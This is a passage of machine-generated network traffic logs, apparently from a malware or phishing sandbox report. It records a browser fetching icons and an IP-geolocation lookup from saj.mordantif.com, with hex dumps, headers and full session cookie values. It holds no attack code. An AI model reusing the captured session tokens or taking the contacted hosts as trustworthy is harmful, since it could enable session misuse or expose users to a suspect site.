                                                        2024-09-13 13:07:09 UTC849INData Raw: 31 32 34 2d 2e 37 35 38 6c 2d 38 2e 33 30 39 2d 38 2e 33 30 39 61 33 2e 35 32 2c 33 2e 35 32 2c 30 2c 30 2c 31 2d 2e 37 35 38 2d 31 2e 31 32 34 2c 33 2e 33 37 35 2c 33 2e 33 37 35 2c 30 2c 30 2c 31 2d 2e 32 37 2d 31 2e 33 33 33 2c 33 2e 30 36 32 2c 33 2e 30 36 32 2c 30 2c 30 2c 31 2c 2e 32 32 36 2d 31 2e 32 31 31 2c 34 2e 33 31 33 2c 34 2e 33 31 33 2c 30 2c 30 2c 31 2c 2e 35 36 36 2d 2e 39 36 37 2c 36 2e 33 36 34 2c 36 2e 33 36 34 2c 30 2c 30 2c 31 2c 2e 37 33 32 2d 2e 37 39 33 71 2e 33 39 32 2d 2e 33 35 37 2e 37 33 32 2d 2e 36 38 38 61 34 2e 36 37 38 2c 34 2e 36 37 38 2c 30 2c 30 2c 30 2c 2e 35 36 36 2d 2e 36 35 33 2c 31 2e 31 37 35 2c 31 2e 31 37 35 2c 30 2c 30 2c 30 2c 2e 32 32 36 2d 2e 36 38 38 2c 31 2e 33 33 39 2c 31 2e 33 33 39 2c 30 2c 30 2c 30 2d
                                                        Data Ascii: 124-.758l-8.309-8.309a3.52,3.52,0,0,1-.758-1.124,3.375,3.375,0,0,1-.27-1.333,3.062,3.062,0,0,1,.226-1.211,4.313,4.313,0,0,1,.566-.967,6.364,6.364,0,0,1,.732-.793q.392-.357.732-.688a4.678,4.678,0,0,0,.566-.653,1.175,1.175,0,0,0,.226-.688,1.339,1.339,0,0,0-
                                                        2024-09-13 13:07:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        68192.168.2.549819172.67.148.274433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:07:09 UTC1463OUTGET /rsc29PUGZXGytlZ4a12Ib7SKJKCK2VqFWGPhMrghtk1NENcQADfU8gfkOTDnYef200 HTTP/1.1
                                                        Host: saj.mordantif.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://saj.mordantif.com/RTOGZZBDODKFRWTTVU5W0HM2Y143SY2BLP11CI?fygndawgjewqbrrl267129585769599075856O5CEBFHBXCG6YJORF6T
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6InhlRjF0OEtYc3Q5N2Z1OCtXemFaYVE9PSIsInZhbHVlIjoiOUVudzZJN1ZBcHZGREV0VHZQU1FLM3d0TVViRkNpTERMaUdySGNiRnIwUDdoejhQT2hwS250eEV0VGs4MHNsak5nbjF1SmdXOHhXSVlqdUpqMmtjbUM3N21XQ2EvYXB3TnJ1THZEeTdFc0Z6N2M4TFcxYkM3RUhHTmE2Ym9zVFkiLCJtYWMiOiIwMDIwMzBiYTc4YWQzZTA2OWE0NTgzMjk1NDJkMjVhNWVkN2M0ZjlmMDVkNGIyYjk2MDhjY2VkYTRkM2Q2ODhjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InlkanJBa2VXSWdiTER3ZFQ1dXBqUEE9PSIsInZhbHVlIjoiYkt6MU1TSm1yMzROakJlNGsyV3UvVkZiMkdvem12c0F0OGhDMXNlUFBwTmV1L2RxREpFZVArQnc5eVhDUEtJWVVPZ3JDb2N2TFJLY0I2Q2cyTjBULzVnRWRBUEM5RytBN1V6ZFlhUWs0UnF4ZHA4MFp1KzZCNEs5cjczQVZxd3EiLCJtYWMiOiJiNzYyNDY3Yjg3MTNjNDYyODk3M2FlNjRmM2FmZDk4YTlkYTE1NWZiMjI1N2ZkZGViM2M3MTI3NjEwMzVmODliIiwidGFnIjoiIn0%3D
                                                        2024-09-13 13:07:10 UTC667INHTTP/1.1 200 OK
                                                        Date: Fri, 13 Sep 2024 13:07:09 GMT
                                                        Content-Type: image/svg+xml
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Content-Disposition: inline; filename="rsc29PUGZXGytlZ4a12Ib7SKJKCK2VqFWGPhMrghtk1NENcQADfU8gfkOTDnYef200"
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Cxl9Ni4pxZT%2FNKatoa2CVmPQALAXRqb3IkRj9P%2BwZ1nAsHwh2tsj8jI67wlDbAkkWjjhTRq4qLrFJRz9LO8T9TMtR0yxX4uzoSoELZOfPcVhc2y24GCLelBUYYH1QQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8c285bd04e6241c3-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-09-13 13:07:10 UTC275INData Raw: 31 30 63 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 31 30 2c 33 32 48 33 38 56 31 38 2e 31 32 35 4c 32 34 2c 32 35 2e 31 30 39 2c 31 30 2c 31 38 2e 31 32 35 56 33 32 6d 2e 32 33 34 2d 31 36 4c 32 34 2c 32 32 2e 38 39 31 2c 33 37 2e 37 36 36 2c 31 36 48 31 30 2e 32 33 34 4d 34 30 2c 33 34 48 38 56 31 34 48 34 30 5a 22 20 66 69 6c 6c
                                                        Data Ascii: 10c<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M10,32H38V18.125L24,25.109,10,18.125V32m.234-16L24,22.891,37.766,16H10.234M40,34H8V14H40Z" fill
                                                        2024-09-13 13:07:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        69192.168.2.549820104.26.1.1004433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:07:10 UTC601OUTGET /v1/ip/geo.json HTTP/1.1
                                                        Host: get.geojs.io
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        Accept: application/json, text/javascript, */*; q=0.01
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Origin: https://saj.mordantif.com
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://saj.mordantif.com/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-09-13 13:07:10 UTC909INHTTP/1.1 200 OK
                                                        Date: Fri, 13 Sep 2024 13:07:10 GMT
                                                        Content-Type: application/json
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        x-request-id: 6cba0b092d7e478075602cf497de799b-ASH
                                                        strict-transport-security: max-age=15552000; includeSubDomains; preload
                                                        access-control-allow-origin: *
                                                        access-control-allow-methods: GET
                                                        pragma: no-cache
                                                        Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                        geojs-backend: ash-01
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JbIInOGkcjanovU0tEo64Mriv5sqODg3rVzBCKw0uMRFm39pRyMYGL6%2FIFGJNsI3yoLOccgMnNpVPOU3%2Bk%2BXh6wdEyZgBpNB3kIHoBnlIu9anarbLXWV8ODsO1WUcQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        X-Content-Type-Options: nosniff
                                                        Server: cloudflare
                                                        CF-RAY: 8c285bd47827c32c-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-09-13 13:07:10 UTC332INData Raw: 31 34 35 0d 0a 7b 22 61 63 63 75 72 61 63 79 22 3a 32 30 2c 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 5c 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 3a 22 41 53 33 33 35 36 20 4c 45 56 45 4c 33 22 2c 22 61 73 6e 22 3a 33 33 35 36 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 61 72 65 61 5f 63 6f 64 65 22 3a 22 30 22 2c 22 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 5f 6e 61 6d 65 22 3a 22 4c 45 56 45 4c 33 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 33 22 3a 22 55 53 41 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 22 3a 22 4e 41 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65
                                                        Data Ascii: 145{"accuracy":20,"ip":"8.46.123.33","timezone":"America\/New_York","organization":"AS3356 LEVEL3","asn":3356,"city":"New York","area_code":"0","organization_name":"LEVEL3","country_code":"US","country_code3":"USA","continent_code":"NA","country":"Unite
                                                        2024-09-13 13:07:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        70192.168.2.549823104.21.55.1244433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:07:10 UTC1114OUTGET /uvtOweyyjyKYQ0krMEjD3S65UkP8fHqrZofTHOSWLmnqO12130 HTTP/1.1
                                                        Host: saj.mordantif.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6InhlRjF0OEtYc3Q5N2Z1OCtXemFaYVE9PSIsInZhbHVlIjoiOUVudzZJN1ZBcHZGREV0VHZQU1FLM3d0TVViRkNpTERMaUdySGNiRnIwUDdoejhQT2hwS250eEV0VGs4MHNsak5nbjF1SmdXOHhXSVlqdUpqMmtjbUM3N21XQ2EvYXB3TnJ1THZEeTdFc0Z6N2M4TFcxYkM3RUhHTmE2Ym9zVFkiLCJtYWMiOiIwMDIwMzBiYTc4YWQzZTA2OWE0NTgzMjk1NDJkMjVhNWVkN2M0ZjlmMDVkNGIyYjk2MDhjY2VkYTRkM2Q2ODhjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InlkanJBa2VXSWdiTER3ZFQ1dXBqUEE9PSIsInZhbHVlIjoiYkt6MU1TSm1yMzROakJlNGsyV3UvVkZiMkdvem12c0F0OGhDMXNlUFBwTmV1L2RxREpFZVArQnc5eVhDUEtJWVVPZ3JDb2N2TFJLY0I2Q2cyTjBULzVnRWRBUEM5RytBN1V6ZFlhUWs0UnF4ZHA4MFp1KzZCNEs5cjczQVZxd3EiLCJtYWMiOiJiNzYyNDY3Yjg3MTNjNDYyODk3M2FlNjRmM2FmZDk4YTlkYTE1NWZiMjI1N2ZkZGViM2M3MTI3NjEwMzVmODliIiwidGFnIjoiIn0%3D
                                                        2024-09-13 13:07:10 UTC638INHTTP/1.1 200 OK
                                                        Date: Fri, 13 Sep 2024 13:07:10 GMT
                                                        Content-Type: image/png
                                                        Content-Length: 231
                                                        Connection: close
                                                        Content-Disposition: inline; filename="uvtOweyyjyKYQ0krMEjD3S65UkP8fHqrZofTHOSWLmnqO12130"
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b5ELaKbEHjshCiRlDbyy0nbltPvD4z8B5Cm6FWZbcD%2BvcRhxvgKvDZRquNhtei8znxRgbfhNT75li4wxMBxCBQzOVn4Gs4ET2MPA2ZVip7DQpKitdXrvwoy8vRXqSw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Server: cloudflare
                                                        CF-RAY: 8c285bd61cb643f7-EWR
                                                        2024-09-13 13:07:10 UTC231INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 18 00 00 00 18 08 06 00 00 00 e0 77 3d f8 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 a1 49 44 41 54 48 4b ed 93 b1 0d 02 31 10 04 e7 5a a0 0c aa b8 12 a8 80 9c 2e 20 23 24 23 a5 94 2d e1 cb 20 24 24 33 b2 f4 48 1f 80 cf bc 71 80 78 a7 3e ed 78 c7 b6 d1 79 59 e7 7c 16 40 68 f8 8f 14 b9 fb 05 18 24 9d 42 2f 93 81 2a 45 63 f8 0a d8 4a ba 7d 15 d0 12 9e 0f 52 6c d0 1a 5e 04 8c e1 1b e0 0c dc 23 2d 92 0e af 66 de 36 70 f7 63 4a 69 67 66 b5 80 fd 47 80 3c 9c 21 c0 7a ce e5 3e 61 e1 2b 6a 85 84 80 d6 26 55 80 09 e4 da e5 a3 45 2f a8 b4 5f dd 60 2e 64 01 84 e6 7e 5f d1 03 bf ca 37 19 0c 18 34 60 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                        Data Ascii: PNGIHDRw=sRGBIDATHK1Z. #$#- $$3Hqx>xyY|@h$B/*EcJ}Rl^#-f6pcJigfG<!z>a+j&UE/_`.d~_74`IENDB`


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        71192.168.2.549821104.21.55.1244433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:07:10 UTC1115OUTGET /qrzQaQ92ePEnjRgmrblnV721RttaWBghmDscAvjTLQ9Ke145140 HTTP/1.1
                                                        Host: saj.mordantif.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6InhlRjF0OEtYc3Q5N2Z1OCtXemFaYVE9PSIsInZhbHVlIjoiOUVudzZJN1ZBcHZGREV0VHZQU1FLM3d0TVViRkNpTERMaUdySGNiRnIwUDdoejhQT2hwS250eEV0VGs4MHNsak5nbjF1SmdXOHhXSVlqdUpqMmtjbUM3N21XQ2EvYXB3TnJ1THZEeTdFc0Z6N2M4TFcxYkM3RUhHTmE2Ym9zVFkiLCJtYWMiOiIwMDIwMzBiYTc4YWQzZTA2OWE0NTgzMjk1NDJkMjVhNWVkN2M0ZjlmMDVkNGIyYjk2MDhjY2VkYTRkM2Q2ODhjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InlkanJBa2VXSWdiTER3ZFQ1dXBqUEE9PSIsInZhbHVlIjoiYkt6MU1TSm1yMzROakJlNGsyV3UvVkZiMkdvem12c0F0OGhDMXNlUFBwTmV1L2RxREpFZVArQnc5eVhDUEtJWVVPZ3JDb2N2TFJLY0I2Q2cyTjBULzVnRWRBUEM5RytBN1V6ZFlhUWs0UnF4ZHA4MFp1KzZCNEs5cjczQVZxd3EiLCJtYWMiOiJiNzYyNDY3Yjg3MTNjNDYyODk3M2FlNjRmM2FmZDk4YTlkYTE1NWZiMjI1N2ZkZGViM2M3MTI3NjEwMzVmODliIiwidGFnIjoiIn0%3D
                                                        2024-09-13 13:07:10 UTC647INHTTP/1.1 200 OK
                                                        Date: Fri, 13 Sep 2024 13:07:10 GMT
                                                        Content-Type: image/png
                                                        Content-Length: 727
                                                        Connection: close
                                                        Content-Disposition: inline; filename="qrzQaQ92ePEnjRgmrblnV721RttaWBghmDscAvjTLQ9Ke145140"
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ykC7Tbp84186oPydqM5KdYq0Q3wHzmeAd9fh9GhV3a%2BgWoB0EMQtjm%2Fg0Djbroa%2B8kE83pQPe9JnnUStO14OlVI0M1Gzz%2BI80Qg2EVSJo1UH3djHi49hXGXHm%2FsSeA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Server: cloudflare
                                                        CF-RAY: 8c285bd6199dc343-EWR
                                                        2024-09-13 13:07:10 UTC722INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 30 00 00 00 30 08 06 00 00 00 57 02 f9 87 00 00 02 9e 49 44 41 54 68 43 ed 97 81 51 1c 31 0c 45 8f 0e a0 83 a3 03 e8 60 a9 00 a8 20 a4 02 a0 82 90 0a a0 03 ae 83 90 0a b2 54 00 1d e4 3a 80 0e c8 7f 37 72 c6 ec dc ad e5 b5 73 77 3b 59 cf 68 18 f6 64 4b 5f 5f 92 e5 83 d9 c8 d7 c1 c8 fd 9f 4d 00 76 cd e0 c4 c0 c4 40 61 04 fe df 14 6a 9a e6 50 c1 3b 91 9c 4b 1a 09 ff b3 5e 25 ef 92 e7 b6 6d 17 85 01 4e 6e 1f c4 80 9c bf d1 c9 d7 92 79 d2 c2 6c f6 5d 40 ee 1c 7a 83 54 b2 00 58 d4 1f 65 e9 c2 ac b5 44 5a f2 24 59 1a 0b b0 12 98 e1 6f 60 e5 4c 40 60 a6 ea 72 03 30 e7 7f 99 73 38 42 64 1f fa bc 31 a6 ee 4d 87 3d c7 b5 41 e4 00 f8 61 91 27 c7 2f e5 08 11 4f 2e 81 80 05 40 34 12 6d 6b cf 92 9b 32 14 5c 00 a2
                                                        Data Ascii: PNGIHDR00WIDAThCQ1E` T:7rsw;YhdK__Mv@ajP;K^%mNnyl]@zTXeDZ$Yo`L@`r0s8Bd1M=Aa'/O.@4mk2\
                                                        2024-09-13 13:07:10 UTC5INData Raw: 44 ae 42 60 82
                                                        Data Ascii: DB`


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        72192.168.2.549825104.21.55.1244433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:07:10 UTC1118OUTGET /efAS8MaAYyPMJzZJXh3iwSLoSvYijLRXKbOYqfZGglBeiNuIf90150 HTTP/1.1
                                                        Host: saj.mordantif.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6InhlRjF0OEtYc3Q5N2Z1OCtXemFaYVE9PSIsInZhbHVlIjoiOUVudzZJN1ZBcHZGREV0VHZQU1FLM3d0TVViRkNpTERMaUdySGNiRnIwUDdoejhQT2hwS250eEV0VGs4MHNsak5nbjF1SmdXOHhXSVlqdUpqMmtjbUM3N21XQ2EvYXB3TnJ1THZEeTdFc0Z6N2M4TFcxYkM3RUhHTmE2Ym9zVFkiLCJtYWMiOiIwMDIwMzBiYTc4YWQzZTA2OWE0NTgzMjk1NDJkMjVhNWVkN2M0ZjlmMDVkNGIyYjk2MDhjY2VkYTRkM2Q2ODhjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InlkanJBa2VXSWdiTER3ZFQ1dXBqUEE9PSIsInZhbHVlIjoiYkt6MU1TSm1yMzROakJlNGsyV3UvVkZiMkdvem12c0F0OGhDMXNlUFBwTmV1L2RxREpFZVArQnc5eVhDUEtJWVVPZ3JDb2N2TFJLY0I2Q2cyTjBULzVnRWRBUEM5RytBN1V6ZFlhUWs0UnF4ZHA4MFp1KzZCNEs5cjczQVZxd3EiLCJtYWMiOiJiNzYyNDY3Yjg3MTNjNDYyODk3M2FlNjRmM2FmZDk4YTlkYTE1NWZiMjI1N2ZkZGViM2M3MTI3NjEwMzVmODliIiwidGFnIjoiIn0%3D
                                                        2024-09-13 13:07:11 UTC657INHTTP/1.1 200 OK
                                                        Date: Fri, 13 Sep 2024 13:07:10 GMT
                                                        Content-Type: image/svg+xml
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Content-Disposition: inline; filename="efAS8MaAYyPMJzZJXh3iwSLoSvYijLRXKbOYqfZGglBeiNuIf90150"
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Aex35LhaaQA3cKsVPOT0zTKPDxej772uqA4fK8BgNmwwIlmVbw2acTz87GMDbWYYTTLMcSOkidwQcnNaNbu%2B%2B1Fn%2By3CtNRTnYnaVSpjuF8f0Efr4VY9n3hufPGPcA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Server: cloudflare
                                                        CF-RAY: 8c285bd689860f7c-EWR
                                                        2024-09-13 13:07:11 UTC277INData Raw: 31 30 65 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 32 22 20 68 65 69 67 68 74 3d 22 31 32 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 20 31 32 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 31 32 22 20 68 65 69 67 68 74 3d 22 31 32 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 36 2e 37 2c 36 2c 31 32 2c 31 31 2e 33 30 39 2c 31 31 2e 33 30 39 2c 31 32 2c 36 2c 36 2e 37 2e 36 39 31 2c 31 32 2c 30 2c 31 31 2e 33 30 39 2c 35 2e 33 2c 36 2c 30 2c 2e 36 39 31 2e 36 39 31 2c 30 2c 36 2c 35 2e 33 2c 31 31 2e 33 30 39 2c 30 2c 31 32 2c 2e 36 39 31 5a 22 20 66 69
                                                        Data Ascii: 10e<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 12 12"><title>assets</title><rect width="12" height="12" fill="none"/><path d="M6.7,6,12,11.309,11.309,12,6,6.7.691,12,0,11.309,5.3,6,0,.691.691,0,6,5.3,11.309,0,12,.691Z" fi
                                                        2024-09-13 13:07:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        73192.168.2.549827104.21.55.1244433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:07:10 UTC1124OUTGET /ijwV7YtuMF8FjspkoicNvuuHzs5psb4Z1qUG03wx2ZMyqtXHsmhPOuc78161 HTTP/1.1
                                                        Host: saj.mordantif.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6InhlRjF0OEtYc3Q5N2Z1OCtXemFaYVE9PSIsInZhbHVlIjoiOUVudzZJN1ZBcHZGREV0VHZQU1FLM3d0TVViRkNpTERMaUdySGNiRnIwUDdoejhQT2hwS250eEV0VGs4MHNsak5nbjF1SmdXOHhXSVlqdUpqMmtjbUM3N21XQ2EvYXB3TnJ1THZEeTdFc0Z6N2M4TFcxYkM3RUhHTmE2Ym9zVFkiLCJtYWMiOiIwMDIwMzBiYTc4YWQzZTA2OWE0NTgzMjk1NDJkMjVhNWVkN2M0ZjlmMDVkNGIyYjk2MDhjY2VkYTRkM2Q2ODhjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InlkanJBa2VXSWdiTER3ZFQ1dXBqUEE9PSIsInZhbHVlIjoiYkt6MU1TSm1yMzROakJlNGsyV3UvVkZiMkdvem12c0F0OGhDMXNlUFBwTmV1L2RxREpFZVArQnc5eVhDUEtJWVVPZ3JDb2N2TFJLY0I2Q2cyTjBULzVnRWRBUEM5RytBN1V6ZFlhUWs0UnF4ZHA4MFp1KzZCNEs5cjczQVZxd3EiLCJtYWMiOiJiNzYyNDY3Yjg3MTNjNDYyODk3M2FlNjRmM2FmZDk4YTlkYTE1NWZiMjI1N2ZkZGViM2M3MTI3NjEwMzVmODliIiwidGFnIjoiIn0%3D
                                                        2024-09-13 13:07:11 UTC661INHTTP/1.1 200 OK
                                                        Date: Fri, 13 Sep 2024 13:07:10 GMT
                                                        Content-Type: image/svg+xml
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Content-Disposition: inline; filename="ijwV7YtuMF8FjspkoicNvuuHzs5psb4Z1qUG03wx2ZMyqtXHsmhPOuc78161"
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=siFBU%2BOgGxWBrMIKgcHoncChS48vR0ZEgbjqxjvyzKK%2FjLZCmvGY7WNpofbjbv1JmivmDGqeaoyWszJznWDeV4hjD193Vwje1n1RWe0Zugt86DbzA0C7GcACg3Pq7g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Server: cloudflare
                                                        CF-RAY: 8c285bd6da0b8c71-EWR
                                                        2024-09-13 13:07:11 UTC708INData Raw: 31 63 64 65 0d 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0d 0a 3c 6d 61 73 6b 20 69 64 3d 22 30 37 62 32 36 30 33 34 2d 35 36 61 33 2d 34 39 64 32 2d 38 66 32 36 2d 63 37 62 38 34 65 62 34 65 65 64 34 22 20 66 69 6c 6c 3d 22 23 66 66 66 66 66 66 22 3e 0d 0a 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 63 6c 69 70 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 32 33 2e 39 37 36 32 20 30 43 31 36 2e 38 32 34 34 20 30 20 31 30 2e 39 37 30 37 20 35 2e 32 34 33 32 35 20 31
